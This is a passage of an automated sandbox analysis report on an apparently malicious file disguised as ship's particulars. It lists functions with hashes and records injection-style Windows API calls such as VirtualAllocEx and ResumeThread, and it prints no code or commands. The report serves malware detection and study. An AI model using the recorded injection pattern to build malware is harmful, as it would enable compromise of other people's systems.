                                                                                                                  • API String ID: 1726664587-0
                                                                                                                  • Opcode ID: ad23debdc802f751732143a337104261c0befd165f778cfdad90a2865d1da009
                                                                                                                  • Instruction ID: aa43c773d7d16543c379e29c87381d8e7c4145783b8bc9dac4e60a6e2cc5ce05
                                                                                                                  • Opcode Fuzzy Hash: ad23debdc802f751732143a337104261c0befd165f778cfdad90a2865d1da009
                                                                                                                  • Instruction Fuzzy Hash: CA2128B1D003499FCB10DFAAC885ADEBBF5FF48320F10842AE558A7250D7789540DBA1
                                                                                                                  Function 00B5D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B5D677
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DuplicateHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3793708945-0
                                                                                                                  • Opcode ID: 198f66ac84f9024fb871a251cb6a1545b82711f134e7ec8bbff28cde307864aa
                                                                                                                  • Instruction ID: 48d98350c5fcfe0d48ce1b852e95bd3b64418ef43cbb54904210132b5ae01e0b
                                                                                                                  • Opcode Fuzzy Hash: 198f66ac84f9024fb871a251cb6a1545b82711f134e7ec8bbff28cde307864aa
                                                                                                                  • Instruction Fuzzy Hash: 8121E4B5900248DFDB10CF9AD984ADEBBF9FB48320F14805AE918A3310C374A944CFA4
                                                                                                                  Function 06C976F2 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C97766
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: ceffd3ec1789d7450aaa1813d4825a07bf18e0caf96a16144b6158b119e912ef
                                                                                                                  • Instruction ID: 2603bf2d399471cb043b0462116f61f46fc441ef0b462b91770203f8d5232889
                                                                                                                  • Opcode Fuzzy Hash: ceffd3ec1789d7450aaa1813d4825a07bf18e0caf96a16144b6158b119e912ef
                                                                                                                  • Instruction Fuzzy Hash: E51167B29003499FDF10DFAAC845ADEBFF9EF88320F208419E519A7250C775A540DFA1
                                                                                                                  Function 06C976F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C97766
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4275171209-0
                                                                                                                  • Opcode ID: 44681ac7564e8de0d37ac3a924ac407aa1c7b5497533f66f58ddd2b35a9d5a31
                                                                                                                  • Instruction ID: 3f384e7e2e616d3eb1b27c30c5fda9658c0c726040e29e38be31bcb93264ee20
                                                                                                                  • Opcode Fuzzy Hash: 44681ac7564e8de0d37ac3a924ac407aa1c7b5497533f66f58ddd2b35a9d5a31
                                                                                                                  • Instruction Fuzzy Hash: CC1137B19003499FCF10DFAAC845ADEBFF9EF88324F248419E519A7250C775A540DFA1
                                                                                                                  Function 06C97130 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ResumeThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 947044025-0
                                                                                                                  • Opcode ID: 48504c27e6f371be883c135db01a7277de45ba80bdb9a09f5d8ca7c6438455dd
                                                                                                                  • Instruction ID: e5ee8870fd85716ab4ad08c471bcebfb4d2e67768025b5c2fc9856fd74b7ace3
                                                                                                                  • Opcode Fuzzy Hash: 48504c27e6f371be883c135db01a7277de45ba80bdb9a09f5d8ca7c6438455dd
                                                                                                                  • Instruction Fuzzy Hash: 961158B1D003498FDB20DFAAC8457DEFFF5EB88324F208419D459A7250C775A941CBA4
                                                                                                                  Function 06C97138 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ResumeThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 947044025-0
                                                                                                                  • Opcode ID: 5ed3bb9bf942c1d1ea64c11aee843c74fa9b4fdd811b8602ac7b700c796f319d
                                                                                                                  • Instruction ID: 5cd3f388578816f5878717dc42633dbcb56e194ca787ab2aada5a13bbeb66c5c
                                                                                                                  • Opcode Fuzzy Hash: 5ed3bb9bf942c1d1ea64c11aee843c74fa9b4fdd811b8602ac7b700c796f319d
                                                                                                                  • Instruction Fuzzy Hash: AA113AB1D003498FDB20DFAAC84579EFBF5EF88324F248419D559A7250C775A540CBA5
                                                                                                                  Function 06C95E08 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C9A305
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 410705778-0
                                                                                                                  • Opcode ID: 62272f78a38c806665c3542349be63110caf7a68b0abc0d2234b4ca5935c6cfd
                                                                                                                  • Instruction ID: 55ec1b512fa9a89e2aaadbf90a280541926ccc20431d5388384b97aaee3facee
                                                                                                                  • Opcode Fuzzy Hash: 62272f78a38c806665c3542349be63110caf7a68b0abc0d2234b4ca5935c6cfd
                                                                                                                  • Instruction Fuzzy Hash: 0F11F2B5800749DFDB50DF9AC889BDEBBF8FB48324F20841AE558A7200C375A944CFA1
                                                                                                                  Function 00B5AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B5AF5E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4139908857-0
                                                                                                                  • Opcode ID: f1d8b7f1a91d0de3b909936c46adb1a707a4a98d5adbe554666a15a8e3a64f5b
                                                                                                                  • Instruction ID: d8b28fa042fee9c604f72bb7dc0d0fa231cb4fbce62be69bcddb12a9d2feb069
                                                                                                                  • Opcode Fuzzy Hash: f1d8b7f1a91d0de3b909936c46adb1a707a4a98d5adbe554666a15a8e3a64f5b
                                                                                                                  • Instruction Fuzzy Hash: 9C11D2B5C003498FCB10CF9AD844B9EFBF5EB88324F14855AD859B7610C379A545CFA1
                                                                                                                  Function 06C9A2A2 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C9A305
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 410705778-0
                                                                                                                  • Opcode ID: 62f29d9e4d5bcb588d054f9d01688dd72200645e3a58d304169fd1a5df2b55d8
                                                                                                                  • Instruction ID: 75f1fcc3ee8df83fa7f9fd6dbe40b069d940d2e8cea8fa1cbde646693479e039
                                                                                                                  • Opcode Fuzzy Hash: 62f29d9e4d5bcb588d054f9d01688dd72200645e3a58d304169fd1a5df2b55d8
                                                                                                                  • Instruction Fuzzy Hash: 8411B0B58003599FDB20CF9AD989BDEBBF8FB48324F20841AE558A7610D375A544CFA1
                                                                                                                  Function 006FD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8664e49143cb3dd8962283244430a742da5077fb80b9392ac31e93fb010effdc
                                                                                                                  • Instruction ID: bfc66cc4a8a54600bf29607c2b986c555e5a6e4ca681e8f85c1d35dad47089a0
                                                                                                                  • Opcode Fuzzy Hash: 8664e49143cb3dd8962283244430a742da5077fb80b9392ac31e93fb010effdc
                                                                                                                  • Instruction Fuzzy Hash: 842125B1504248EFCB15DF14D9C0B36BF67FB98318F24C569EA090B256C336E856DBA2
                                                                                                                  Function 006FD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 75dc6ba846f2ca903fea38c11908c64a9a547f899885628c784ab15981fcb180
                                                                                                                  • Instruction ID: f04779e21757d583b7aa1ed7dd36f188964639b437c6a76818cd016f9ebecda5
                                                                                                                  • Opcode Fuzzy Hash: 75dc6ba846f2ca903fea38c11908c64a9a547f899885628c784ab15981fcb180
                                                                                                                  • Instruction Fuzzy Hash: 872106B1504208DFDB05DF14D9C0B26BFA7FB94324F24C569EA094B256C336F856DAA2
                                                                                                                  Function 0070D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e7b8b7757dc1966c4b97c39f98e30b811207188c9003f5f75eba87bdd7e9d358
                                                                                                                  • Instruction ID: 524c74c24c3890fc12073e09c88f7548e7294763974dd6c13b7f0c83fccb87a7
                                                                                                                  • Opcode Fuzzy Hash: e7b8b7757dc1966c4b97c39f98e30b811207188c9003f5f75eba87bdd7e9d358
                                                                                                                  • Instruction Fuzzy Hash: 582104B1504304EFDB25DF94D9C0B26BBA5FB88314F24CA6DE9094B296C73ADC46CA61
                                                                                                                  Function 0070D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bd657e51b4bd4eb58b3f0960cc9019ec727a742f3b94693e7af2b0518bd84be2
                                                                                                                  • Instruction ID: 230fa7a92e485be263b3b998bee7da2d2b6b2443133228b4851a08ecafb3a7ec
                                                                                                                  • Opcode Fuzzy Hash: bd657e51b4bd4eb58b3f0960cc9019ec727a742f3b94693e7af2b0518bd84be2
                                                                                                                  • Instruction Fuzzy Hash: A42103B1604300DFCB24DF54D9C0B26BBA5EB84314F20C669D80E4B286C33ADC07CA61
                                                                                                                  Function 006FD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction ID: e2024f5c750c1d382edcf6973ce5b0ef6373fdb3eafd4c986acdc03aeacb9be7
                                                                                                                  • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction Fuzzy Hash: BB11E172404284CFCB12CF10D5C0B66BF72FB94318F24C6A9D9090B656C33AE85ACBA2
                                                                                                                  Function 006FD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction ID: a0a2abd48655004998d06dde9401985c244e3375247af21d75c00ba0879788d1
                                                                                                                  • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                  • Instruction Fuzzy Hash: 9E11E172404244DFCB12CF00D5C0B66BFB2FB94324F24C2A9D9090B756C33AE85ACBA2
                                                                                                                  Function 0070D017 Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction ID: f120386f361327e352859fa25ba99cab07187ac89d60c6af13b59228e033c6bd
                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction Fuzzy Hash: 6E11DD75504380CFCB21CF54D5C4B15FBA2FB88318F24C6AAD80D4B696C33AD84ACBA2
                                                                                                                  Function 0070D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819295836.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_70d000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction ID: 1ea357480cc85f1d02c90983a8a67497d9d101e9975a4f15a18ecda1c249dcd7
                                                                                                                  • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                  • Instruction Fuzzy Hash: 3C11BB75504380DFCB22CF54C5C0B15BBA2FB84324F24C6AAD8494B696C33AD84ACB61
                                                                                                                  Function 006FD759 Relevance: .0, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e070664fde26e432d6b8d1c87dca59e957e49438f153049aa3214e800c90ac8
                                                                                                                  • Instruction ID: c5034a408d21d317fedd180a398e74da3da9c328e86bb2c0815130a9c8e248a3
                                                                                                                  • Opcode Fuzzy Hash: 6e070664fde26e432d6b8d1c87dca59e957e49438f153049aa3214e800c90ac8
                                                                                                                  • Instruction Fuzzy Hash: 6401DB710093489AE7106B25DCC4B76FFEADF51324F18C91AEE094E396C779A841D6B1
                                                                                                                  Function 006FD758 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819245750.00000000006FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006FD000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6fd000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 82dfda9b69522adc11ac5114ca6a1d95da4d32e2c44b56bb4b1b69dcc837c111
                                                                                                                  • Instruction ID: a487177e7c96a8975ce46dadc1e84b5a8bdd8377c76ca2d31118935a58fb8c05
                                                                                                                  • Opcode Fuzzy Hash: 82dfda9b69522adc11ac5114ca6a1d95da4d32e2c44b56bb4b1b69dcc837c111
                                                                                                                  • Instruction Fuzzy Hash: 7DF062724053449EE7209A16DDC4B62FFE9EF51724F18C45AEE484E396C379A844CAB1

                                                                                                                  Non-executed Functions

                                                                                                                  Function 06C94E30 Relevance: .3, Instructions: 312COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 41251caaec75ae33bb4a07a39a725529a59af2be15f9a7e7effa34e1ce213205
                                                                                                                  • Instruction ID: 0557083e654295d99f039952f1c1e28148c813c7a4ab5feda1cdb392a7f643eb
                                                                                                                  • Opcode Fuzzy Hash: 41251caaec75ae33bb4a07a39a725529a59af2be15f9a7e7effa34e1ce213205
                                                                                                                  • Instruction Fuzzy Hash: 58E1F874E102598FDB54DFA9C5849AEFBF2FF89304F248169D814AB355D730A982CFA0
                                                                                                                  Function 06C95268 Relevance: .3, Instructions: 312COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c00782a24e67590ef4b012b5e5b6f8cfdf5d0470a6c2214af31472bbce8ee5ba
                                                                                                                  • Instruction ID: 43fed4948fa39691b8c854ef2e8061dcf85f37e08a32c96d300e6e655775568d
                                                                                                                  • Opcode Fuzzy Hash: c00782a24e67590ef4b012b5e5b6f8cfdf5d0470a6c2214af31472bbce8ee5ba
                                                                                                                  • Instruction Fuzzy Hash: EAE11B74E101198FDB54DFA9C5849AEFBF2FF89304F648169D814AB355DB30A982CFA0
                                                                                                                  Function 06C971E8 Relevance: .3, Instructions: 312COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5af4eeb8c7243230e371eede86c3830c5681ef1310bae562ac36269b9ab01c45
                                                                                                                  • Instruction ID: 12fe0b095e7ee6c42c33f6b1423e5e996b93a9518c4c0962108debed36e86b91
                                                                                                                  • Opcode Fuzzy Hash: 5af4eeb8c7243230e371eede86c3830c5681ef1310bae562ac36269b9ab01c45
                                                                                                                  • Instruction Fuzzy Hash: 9DE10974E111198FDB54DFA9C5849AEFBF2FF89304F248169D814AB356D730A982CFA0
                                                                                                                  Function 06C949F8 Relevance: .3, Instructions: 312COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2694b209fa3818fa1e6d6be223909849203f12db8edddb4902b5b4c972a70a18
                                                                                                                  • Instruction ID: 301d1af1e99b9de67a23ca416e9a776a8bb71d7c13b38ba8e3286a726edd4d41
                                                                                                                  • Opcode Fuzzy Hash: 2694b209fa3818fa1e6d6be223909849203f12db8edddb4902b5b4c972a70a18
                                                                                                                  • Instruction Fuzzy Hash: 4CE11574E141198FDB54DFA9C5849AEFBF2BF89304F24C169D814AB355DB30A982CFA0
                                                                                                                  Function 06C96910 Relevance: .3, Instructions: 312COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 63f080eafdb04d405a6eef609f18f04426fb5c3546f867ef8a662277a282e12c
                                                                                                                  • Instruction ID: 68f982e4384d9a5b36216fa13ff24855415a6264005b2c223cf174fff5a6b245
                                                                                                                  • Opcode Fuzzy Hash: 63f080eafdb04d405a6eef609f18f04426fb5c3546f867ef8a662277a282e12c
                                                                                                                  • Instruction Fuzzy Hash: 3BE10774E141198FDB54DFA9C5849AEFBF2FF89304F248169E814AB355DB30A982CF60
                                                                                                                  Function 00B5D51C Relevance: .3, Instructions: 264COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1819750029.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b50000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1abea9065fbe7cfeb8fc1a793198411ed2c3e6721056cb56b1a291cab008ed74
                                                                                                                  • Instruction ID: 886e5089ced0d57baada8ec80db46be23cd00f43d944e2043bb1a38c0df86e99
                                                                                                                  • Opcode Fuzzy Hash: 1abea9065fbe7cfeb8fc1a793198411ed2c3e6721056cb56b1a291cab008ed74
                                                                                                                  • Instruction Fuzzy Hash: E2A13B32A00606CFCF05DFA5D8449AEB7F2FF85301B1585FAE905AB265EB71990ACB40
                                                                                                                  Function 06C96900 Relevance: .1, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1823762941.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6c90000_MV BBG MUARA Ship's Particulars.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8b6199075a5d11b1f56b17bfb92a19e899b1460b6b3e1f074756cd3d3b90b47f
                                                                                                                  • Instruction ID: f886dbd1eed29d5341d7254a44d3a23d1ee209c6198537cbf2e3ea8ba4645c06
                                                                                                                  • Opcode Fuzzy Hash: 8b6199075a5d11b1f56b17bfb92a19e899b1460b6b3e1f074756cd3d3b90b47f
                                                                                                                  • Instruction Fuzzy Hash: 23511B70E142198FDB54DFAAC5849AEFBF2BF89304F24C169D418A7355DB319A42CFA0

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:10.8%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:151
                                                                                                                  Total number of Limit Nodes:16
